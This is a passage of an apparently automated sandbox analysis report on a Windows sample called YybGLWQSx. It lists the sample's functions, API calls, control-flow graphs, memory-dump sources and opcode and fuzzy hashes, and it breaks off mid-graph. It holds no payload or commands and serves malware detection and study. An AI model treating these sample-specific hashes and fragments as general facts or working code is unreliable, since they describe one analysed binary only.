                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: a157e4d479c2fb23c94d75de2c7daa3e679d6635bd7c2598c89373a1bf49ae60
                        • Instruction ID: 3849c28af672c958553dd0cc5667e7c06ac5f862c5a6be747cc1ed8b90fb4267
                        • Opcode Fuzzy Hash: a157e4d479c2fb23c94d75de2c7daa3e679d6635bd7c2598c89373a1bf49ae60
                        • Instruction Fuzzy Hash: 8741D2B1D0071DCBDB24DFA9C884B9DBBF5BF48304F20816AD409AB251DB756946CF91
                        Function 04A14050 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 704 4a14050-4a1408c 705 4a14092-4a14097 704->705 706 4a1413c-4a1415c 704->706 707 4a14099-4a140d0 705->707 708 4a140ea-4a14122 CallWindowProcW 705->708 712 4a1415f-4a1416c 706->712 715 4a140d2-4a140d8 707->715 716 4a140d9-4a140e8 707->716 709 4a14124-4a1412a 708->709 710 4a1412b-4a1413a 708->710 709->710 710->712 715->716 716->712
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 04A14111
                        Memory Dump Source
                        • Source File: 00000009.00000002.2465947779.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4a10000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: b8198d3f7ccae1de2a958e56c6178ae6289bd19d7477b61585c72dbffe99635b
                        • Instruction ID: 0def5e075a839133431efa416341e91bab32834264cf968f10e77a8683b8248b
                        • Opcode Fuzzy Hash: b8198d3f7ccae1de2a958e56c6178ae6289bd19d7477b61585c72dbffe99635b
                        • Instruction Fuzzy Hash: 574117B8A00309DFDB14CF99C848AAABBF5FB8C314F25C459D519AB321D775A845CFA0
                        Function 0076B7B0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 718 76b7b0-76d734 DuplicateHandle 720 76d736-76d73c 718->720 721 76d73d-76d75a 718->721 720->721
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0076D666,?,?,?,?,?), ref: 0076D727
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 7f854719b958a270096d25d6bc6ccfc2845ddb22c6c3e237e26b141b1cf4a88b
                        • Instruction ID: d259550f199acce9bfa015304f0b2734f5558251e8d4bc4f9a051f6275f7232a
                        • Opcode Fuzzy Hash: 7f854719b958a270096d25d6bc6ccfc2845ddb22c6c3e237e26b141b1cf4a88b
                        • Instruction Fuzzy Hash: 6B2103B5D102489FDB10CF9AD484AEEBBF8EB48310F14801AE919A3310D379A944DFA5
                        Function 0076D698 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 724 76d698-76d69d 725 76d6a5-76d734 DuplicateHandle 724->725 726 76d736-76d73c 725->726 727 76d73d-76d75a 725->727 726->727
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0076D666,?,?,?,?,?), ref: 0076D727
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 8289a10b3934d35aca29ec6c3601bbeb3782514996ae1a9faf048d84e1a34199
                        • Instruction ID: d763de0c0fa4a6c2a1e209342b124682b3b0855fd4d415b9622871d2c056c26a
                        • Opcode Fuzzy Hash: 8289a10b3934d35aca29ec6c3601bbeb3782514996ae1a9faf048d84e1a34199
                        • Instruction Fuzzy Hash: D42100B5D00209DFDB10CFAAD584ADEBBF5EB48310F14801AE859A7250C378A945CFA1
                        Function 0076A188 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 730 76a188-76b280 732 76b282-76b285 730->732 733 76b288-76b2b7 LoadLibraryExW 730->733 732->733 734 76b2c0-76b2dd 733->734 735 76b2b9-76b2bf 733->735 735->734
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0076B099,00000800,00000000,00000000), ref: 0076B2AA
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 27d8f4bbb41c75b20d24431de31a0eeb962ab06e449ee56fef7b08a48cd1f01c
                        • Instruction ID: 93d481e69e5c212bb25d28b45dc0891836a09aed9f9e6df92547e64bdec7a288
                        • Opcode Fuzzy Hash: 27d8f4bbb41c75b20d24431de31a0eeb962ab06e449ee56fef7b08a48cd1f01c
                        • Instruction Fuzzy Hash: C211D3B6D003499FDB10DF9AD444A9EFBF4FB89320F10842AD91AA7600C379A945CFA5
                        Function 0076B238 Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0076B099,00000800,00000000,00000000), ref: 0076B2AA
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 879191a7bdaa294296a0db9156f8fe8d435221321bafc9393ccd5687db58641e
                        • Instruction ID: 6e784ec364da7a5c6b764ad18f427d2cbddfcbc491db548452b5ebb77133b43c
                        • Opcode Fuzzy Hash: 879191a7bdaa294296a0db9156f8fe8d435221321bafc9393ccd5687db58641e
                        • Instruction Fuzzy Hash: 021112B6C00209CFDB10CFAAD544BDEFBF5AB88310F14842AD829A7610C379A945CFA5
                        Function 0076AFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0076B01E
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: eab2008abf19673853275cca1801b5e4a04738ab4926b01140e8145da13dfbf0
                        • Instruction ID: 0caf61aa912f1e34b40751747b43537ebed63b3e5040a5cdc74013783cfab915
                        • Opcode Fuzzy Hash: eab2008abf19673853275cca1801b5e4a04738ab4926b01140e8145da13dfbf0
                        • Instruction Fuzzy Hash: B511DFB5C002498FCB14CF9AD444BDEFBF4AB89314F10842AD829A7610D379A549CFA1
                        Function 006FD4C4 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2203445222.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6fd000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b260caf44c206bb3dc6bc3b2f2c561f8641ae943d7b64bf02ce33ebda12045cf
                        • Instruction ID: fac5b912b97b734b59a1f9883c22956f976b8808b25bea43c885d1fa95fafcca
                        • Opcode Fuzzy Hash: b260caf44c206bb3dc6bc3b2f2c561f8641ae943d7b64bf02ce33ebda12045cf
                        • Instruction Fuzzy Hash: 5321D6B1504248DFDB05DF14D9C0B36BF67FB94318F24C569DA050B256C336E856D6A1
                        Function 006FD3D8 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2203445222.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6fd000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 841a0391daf3953694726e73080f2557f925389d0f6f3888e6ccf10c073e5660
                        • Instruction ID: cae553afc0b6fe618b5d81adeaec8ff10e555d25ff0fbf4f08bb27e1986e79cf
                        • Opcode Fuzzy Hash: 841a0391daf3953694726e73080f2557f925389d0f6f3888e6ccf10c073e5660
                        • Instruction Fuzzy Hash: 2C2128B1504208DFDB05DF14D9C0B2ABFA7FB94314F24C569DA090B356C336F856C6A2
                        Function 0070D1D4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2211676135.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_70d000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cdbb5b0f7aa5632246ec8bc5247dcf69808f4c322bcc8c4b8ec892222503adeb
                        • Instruction ID: 26401c07a46cba3e3b6942efc3327689544f008560746eec06a6cf9c305de424
                        • Opcode Fuzzy Hash: cdbb5b0f7aa5632246ec8bc5247dcf69808f4c322bcc8c4b8ec892222503adeb
                        • Instruction Fuzzy Hash: 0221F2B1504304EFDB25DF94D9C0B26BBA5FB88314F24C66DE8094B296C33ADC16CA61
                        Function 0070D01C Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2211676135.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_70d000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 58464b83c265ab603237413e8e95abfe0e2a5fb43796fa8469bde3eab66bcf43
                        • Instruction ID: 79d9953c2db1ce63bdd0e07d0e3ccdb6ff120b66ade5b6fd468ac5007dc04ce6
                        • Opcode Fuzzy Hash: 58464b83c265ab603237413e8e95abfe0e2a5fb43796fa8469bde3eab66bcf43
                        • Instruction Fuzzy Hash: 4621D0B1604344EFDB24DF94D9C4B26BBA5EB88314F24C669D84E4B286C37ADC07CA61
                        Function 006FD4BF Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2203445222.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6fd000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                        • Instruction ID: caa4b30e5175cb8835db1c5679eb3d5d43607694a3be81c9be30236e42029b2a
                        • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                        • Instruction Fuzzy Hash: 12110372404284CFCB02CF10D5C4B6ABF72FB94314F24C6A9D9490B756C336E85ACBA2
                        Function 006FD3D3 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2203445222.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6fd000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                        • Instruction ID: d97d87ed846bab90f13478b3fb3cbda7c48f20927967aa865b021ffa21c5edbf
                        • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                        • Instruction Fuzzy Hash: 9D110372404244DFCB02CF00D5C4B66BFB2FB94324F24C2A9D9090B756C33AE85ACBA2
                        Function 0070D017 Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2211676135.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_70d000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                        • Instruction ID: ce7ea5efc70e026db010a32e4b502cc6d555eec559c1c024243c8bdccfb9dfb6
                        • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                        • Instruction Fuzzy Hash: C711BB75504380CFCB21CF54D5C4B15BBA2FB88314F24C6AAD8494B696C33AD80ACBA2
                        Function 0070D1CF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2211676135.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_70d000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                        • Instruction ID: 2ea773a52ac327fbdfc459aa6756ecdcbce820c9ececd061780736fc557d1428
                        • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                        • Instruction Fuzzy Hash: 8A11BB75904380DFCB12CF54D5C4B15BBA1FB84324F24C6A9D8494B696C33AD81ACB61
                        Function 006FD745 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2203445222.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6fd000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cce7299f315f6db10a54b5e7393f72382420e5ca856597df61c94f83bb34f3da
                        • Instruction ID: 332d18a85ed96b77b2d13b88cba7bad424ff2ac3ec2b349b3b9693dce4acf900
                        • Opcode Fuzzy Hash: cce7299f315f6db10a54b5e7393f72382420e5ca856597df61c94f83bb34f3da
                        • Instruction Fuzzy Hash: 5F01DB710083489AE710AF15CDC4B77BF9ADF41364F28C51AEE094E296D379A845D6B1
                        Function 006FD744 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2203445222.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6fd000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 570fb4f29c0a4d1ac92c440ea6e3f3289734247433de45b4f6178c546fadc28b
                        • Instruction ID: 063935916b124cc069d71e088ce4fe084a73079ed3f335c922ed615ac242e89a
                        • Opcode Fuzzy Hash: 570fb4f29c0a4d1ac92c440ea6e3f3289734247433de45b4f6178c546fadc28b
                        • Instruction Fuzzy Hash: 2FF062714043449EE7109E15DD88BA2FF99EF51734F18C45AED085E296C379A845CAB1

                        Execution Graph

                        Execution Coverage:0%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:1
                        Total number of Limit Nodes:0
                        execution_graph 61896 1622c1d LdrInitializeThunk

                        Executed Functions

                        Function 01622C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 1622c0a-1622c0f 1 1622c11-1622c18 0->1 2 1622c1f-1622c26 LdrInitializeThunk 0->2
                        APIs
                        • LdrInitializeThunk.NTDLL(0163FD4F,000000FF,00000024,016D6634,00000004,00000000,?,-00000018,7D810F61,?,?,015F8B12,?,?,?,?), ref: 01622C24
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 5757b8eeb315fced8404229affb36b42493b773890ecf5f22d5d392d1da97638
                        • Instruction ID: 0ecff2aca33659c0c3924ebc81bfa6ca81043a41d1ddbae41014f68c756c0c9a
                        • Opcode Fuzzy Hash: 5757b8eeb315fced8404229affb36b42493b773890ecf5f22d5d392d1da97638
                        • Instruction Fuzzy Hash: B4B09B71D019D5C5DA51E7644E08717791477D0701F15C165E2034751F4738C1D1F675
                        Function 01622DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 5 1622df0-1622dfc LdrInitializeThunk
                        APIs
                        • LdrInitializeThunk.NTDLL(0165E73E,0000005A,016BD040,00000020,00000000,016BD040,00000080,01644A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0162AE00), ref: 01622DFA
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 7c851b553deff2e51e687cfeb96a88923f544fd0e06972dd9bcb4ebfab49ed86
                        • Instruction ID: 49bc0e817323dcb92121d463c592645275d51ac61b7b22abb9bbe65dbf089442
                        • Opcode Fuzzy Hash: 7c851b553deff2e51e687cfeb96a88923f544fd0e06972dd9bcb4ebfab49ed86
                        • Instruction Fuzzy Hash: 2090023160140413D11175584904747001D97D0241F95C512B4428658ED6568A53B221
                        Function 01622C1D Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 4 1622c1d-1622c26 LdrInitializeThunk
                        APIs
                        • LdrInitializeThunk.NTDLL(0163FD4F,000000FF,00000024,016D6634,00000004,00000000,?,-00000018,7D810F61,?,?,015F8B12,?,?,?,?), ref: 01622C24
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e2e2c39a22a0ae5c7bfb744a03ad67fe0e47166f450796d4e4a864cf2dce9519
                        • Instruction ID: 45b5277b0fb322a7e5b41da64b53393cc993cdeeed6f6a67038f0ef4e13ac968
                        • Opcode Fuzzy Hash: e2e2c39a22a0ae5c7bfb744a03ad67fe0e47166f450796d4e4a864cf2dce9519
                        • Instruction Fuzzy Hash: 94A00231851206478241AA1448844A9A268FAE022135AC347ED068551B472D2497B671
                        Function 016235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 6 16235c0-16235cc LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: b390988428a2ba8ea373c9417743876ba929bddfb09a57d115ea201bfda7e2cd
                        • Instruction ID: 6b0abfa080f58805b4afb7f003ea9affff3d96b21fa665befba6a9d8f8c98f6a
                        • Opcode Fuzzy Hash: b390988428a2ba8ea373c9417743876ba929bddfb09a57d115ea201bfda7e2cd
                        • Instruction Fuzzy Hash: 9A900231A0550402D10075584914747101997D0201F65C511B4428668EC7958A5276A2
                        Function 0042C000 Relevance: .0, Instructions: 25COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 7 42c000-42c027 9 42c02d-42c03b 7->9
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775275879.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_42c000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 683a6ba25e1ac3d0a1a754f03f7f9f0cf31e7a4c7bc42913b863bb4bf04aa763
                        • Instruction ID: 83a525731ca45fbc2d24cb8750c598b599a2673199e188f760fb8d6659ab5fd8
                        • Opcode Fuzzy Hash: 683a6ba25e1ac3d0a1a754f03f7f9f0cf31e7a4c7bc42913b863bb4bf04aa763
                        • Instruction Fuzzy Hash: 58E02621A892147BD211D214AC82FEE7768DB85300F40058BF6488A0C1D7983F508396

                        Non-executed Functions

                        Function 01624A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 10 1624a80-1624a8b 11 1624a9f-1624aa6 10->11 12 1624a8d-1624a99 RtlDebugPrintTimes 10->12 13 1624aa8-1624aae 11->13 14 1624aaf-1624ab6 call 160f5a0 11->14 12->11 18 1624b25-1624b26 12->18 19 1624b23 14->19 20 1624ab8-1624b22 call 1611e46 * 2 14->20 19->18 20->19
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: 0Iv$0Iv$0Iv$0Iv$0Iv$0Iv
                        • API String ID: 3446177414-2083360775
                        • Opcode ID: 1bfacecb3e4eab58c881d7817dc1f7e0a0849ee764cbe8cb3629823d6c9d5200
                        • Instruction ID: 8fc65dff8950e988f81cc92074311c7217a890ad74a643380124e035393a7d15
                        • Opcode Fuzzy Hash: 1bfacecb3e4eab58c881d7817dc1f7e0a0849ee764cbe8cb3629823d6c9d5200
                        • Instruction Fuzzy Hash: 3E01B132E066216AD7349E38BC047872BE1B789729F09505EE908CB388DB714C51DBA4
                        Function 01622890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 221 1622890-16228b3 222 165a4bc-165a4c0 221->222 223 16228b9-16228cc 221->223 222->223 224 165a4c6-165a4ca 222->224 225 16228ce-16228d7 223->225 226 16228dd-16228df 223->226 224->223 228 165a4d0-165a4d4 224->228 225->226 229 165a57e-165a585 225->229 227 16228e1-16228e5 226->227 230 16228eb-16228fa 227->230 231 1622988-162298e 227->231 228->223 232 165a4da-165a4de 228->232 229->226 233 1622900-1622905 230->233 234 165a58a-165a58d 230->234 235 1622908-162290c 231->235 232->223 236 165a4e4-165a4eb 232->236 233->235 234->235 235->227 237 162290e-162291b 235->237 238 165a564-165a56c 236->238 239 165a4ed-165a4f4 236->239 240 1622921 237->240 241 165a592-165a599 237->241 238->223 242 165a572-165a576 238->242 243 165a4f6-165a4fe 239->243 244 165a50b 239->244 246 1622924-1622926 240->246 253 165a5a1-165a5c9 call 1630050 241->253 242->223 247 165a57c call 1630050 242->247 243->223 248 165a504-165a509 243->248 245 165a510-165a536 call 1630050 244->245 261 165a55d-165a55f 245->261 250 1622993-1622995 246->250 251 1622928-162292a 246->251 247->261 248->245 250->251 256 1622997-16229b1 call 1630050 250->256 258 1622946-1622966 call 1630050 251->258 259 162292c-162292e 251->259 270 1622969-1622974 256->270 258->270 259->258 264 1622930-1622944 call 1630050 259->264 267 1622981-1622985 